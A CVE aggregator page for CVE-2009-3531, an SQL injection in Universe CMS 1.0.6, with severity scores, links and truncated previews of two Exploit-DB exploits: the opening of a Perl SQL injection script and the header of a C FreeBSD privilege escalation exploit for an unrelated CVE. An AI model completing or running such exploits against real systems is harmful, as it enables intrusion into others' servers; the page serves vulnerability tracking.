CVE-2009-3531
published 2009-10-02CVE-2009-3531: SQL injection vulnerability in vnews.php in Universe CMS 1.0.6 allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.02%
59.2th percentile
SQL injection vulnerability in vnews.php in Universe CMS 1.0.6 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| universe | universe_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection
exploitdb·2009-07-09
CVE-2009-3531 Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection
Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection
---
#!/usr/bin/perl -w
# Universe CMS 1.0.6 (id) Remote SQL Injection Exploit
# Demo : http://www.universe.uni.org.pl
# Download : http://www.universe.uni.org.pl/upload/universecms106.rar
# Found by : Mr.tro0oqy
# E-mail : [email protected]
# special thank for my teacher "Stack"
########################################
system("color e");
print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
print "\t\t0 Universe CMS 1.0.6 (id) Remote SQL Injection Exploit 0\n\n";
print "\t\t0 by Mr.tro0oqy 0\n\n";
print "\t\t0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://target.com/path \n" unless @ARGV;
$user="login";
$pass="password";
$tab="uni_users";
$b = LWP:
Exploit-DB
FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
exploitdb·2009-07-09·CVSS 6.9
CVE-2008-3531 [MEDIUM] FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
---
/*
* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
* (CVE-2008-3531) vulnerability:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531
*
* For a detailed analysis see:
*
* http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/
*
* Sample run:
*
* [argp@leon ~]$ uname -rsi
* FreeBSD 7.0-RELEASE GENERIC
* [argp@leon ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@leon ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
* [argp@leon ~]$ ./cve-2008-3531
* [*] vptr = 0x006e776f
* [*
No writeups or analysis indexed.
http://packetstormsecurity.org/0907-exploits/universecms-sql.txthttp://secunia.com/advisories/35737http://www.exploit-db.com/exploits/9099http://www.osvdb.org/55761https://exchange.xforce.ibmcloud.com/vulnerabilities/51621http://packetstormsecurity.org/0907-exploits/universecms-sql.txthttp://secunia.com/advisories/35737http://www.exploit-db.com/exploits/9099http://www.osvdb.org/55761https://exchange.xforce.ibmcloud.com/vulnerabilities/51621
2009-10-02
Published